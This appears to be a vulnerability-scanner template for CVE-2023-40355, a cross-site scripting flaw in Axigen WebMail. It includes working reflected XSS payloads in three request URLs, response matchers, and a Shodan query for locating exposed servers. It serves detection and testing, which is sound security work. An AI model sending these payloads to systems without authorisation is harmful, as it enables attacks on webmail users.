id: CVE-2023-40355 info: name: Axigen WebMail - Cross-Site Scripting author: amir-h-fallahi severity: medium description: | Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions. reference: - https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html - https://nvd.nist.gov/vuln/detail/CVE-2023-40355 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-40355 cwe-id: CWE-79 epss-score: 0.00587 epss-percentile: 0.77728 cpe: cpe:2.3:a:axigen:axigen_mobile_webmail:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: axigen product: axigen_mobile_webmail shodan-query: http.favicon.hash:-1247684400 tags: cve,cve2023,xss,axigen,webmail http: - method: GET path: - "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//" - "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//" - "{{BaseURL}}/index.hsp?m=',alert(document.domain),'" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "\\\\'-alert(document.domain),//" - "',alert(document.domain),'" condition: or - type: dsl dsl: - 'contains(header, "text/html")' - 'contains(response, "Axigen")' - 'status_code == 200' condition: and # digest: 4a0a0047304502210089d5aa0ce825695bb9ea5e7f7d0ed99275c71b68c467bbc2b7a3f5731ea21a6b0220691c6922540b2937f29bd4712cd7da837b1c42e3305b9aeabc102b8b17c9005d:922c64590222798bb761d5b6d8e72950